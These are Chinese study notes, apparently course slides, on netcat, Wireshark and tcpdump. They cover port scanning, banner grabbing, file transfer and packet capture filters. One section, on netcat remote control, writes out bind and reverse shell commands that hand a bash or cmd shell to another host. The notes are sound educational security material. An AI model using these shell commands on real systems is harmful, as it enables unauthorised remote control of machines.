常用工具

Nc / ncat

NETCAT ——NC

⽹络⼯工具中的瑞⼠军⼑

端口扫描

nc -nvz 1.1.1.1 1-65535 
nc –vnzu 1.1.1.1 1-1024

侦听模式

nc -l -p [端口号]

传输模式

nc -nv [ip][端口]

telnet /获取banner信息

nc –nv [ip] 110 
nc –nv [ip] 25 
nc –nv [ip] 80

传输⽂件/目录

文件传输
A：nc -lp [端口] > 1.mp4             /*  监听本地某一端口，将接收的文件传入指定文件  */
B：nc -nv [ip] [端口] < 1.mp4       /*   传输模式指定ip和端口 传输文件  */
或者
A：nc -lp [端口] < a.mp4
B：nc -nv [ip] [端口] > 2.mp4
传输目录
A：tar -cvf music/ | nc -lp [端口]
B：nc -nv [ip][端口] | tar -xvf ./
加密传⽂文件
A：nc -lp [端口] | mcrypt --flush -Fbqd -a rijndael-256-m ecb > 1.mp4
B： mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv [ip][端口]

NC——远程控制

•正向：
•A：nc -lp 333 -c bash
•B：nc 1.1.1.1 333
•反向：
•A：nc -lp 333
•B：nc 1.1.1.1 333 -c bash
•注：Windows⽤用户把bash改成cmd；

 

WIRESHARK

　　　　抓包嗅探协议分析

　　　　安全专家必备的技

抓包引擎

          　　　　Libpcap9—— Linux

                   　　　　Winpcap10—— Windows

  　解码能⼒力

 

 

 

WIRESHARK——基本使⽤用⽅方法

•启动

wireshark 

 

 

•选择抓包⺴⽹网卡

 

 WIRESHARK——常⻅见协议包

•数据包的分层结构

•Arp

•Icmp

•Tcp——三次握⼿手

•Udp

•Dns

•http

•ftp

 

 

TCPDUMP

　　　　　　　　•No-GUI的抓包分析⼯工具

　　　　　　　•Linux、Unix系统默认安装

 

 

TCPDUMP——抓包 ——筛选

•tcpdump -i eth0 -s 0 -w file.pcap   //抓包 i指定网卡 w写入文件
•tcpdump -r file.pcap                //读取抓包⽂文件 r读取文件

•tcpdump -n -r http.cap | awk '{print $3}'| sort –u
•tcpdump -n src host 145.254.160.237 -r http.cap
•tcpdump -n dst host 145.254.160.237 -r http.cap 
•tcpdump -n port 53 -r http.cap 
•tcpdump -nX port 80 -r http.cap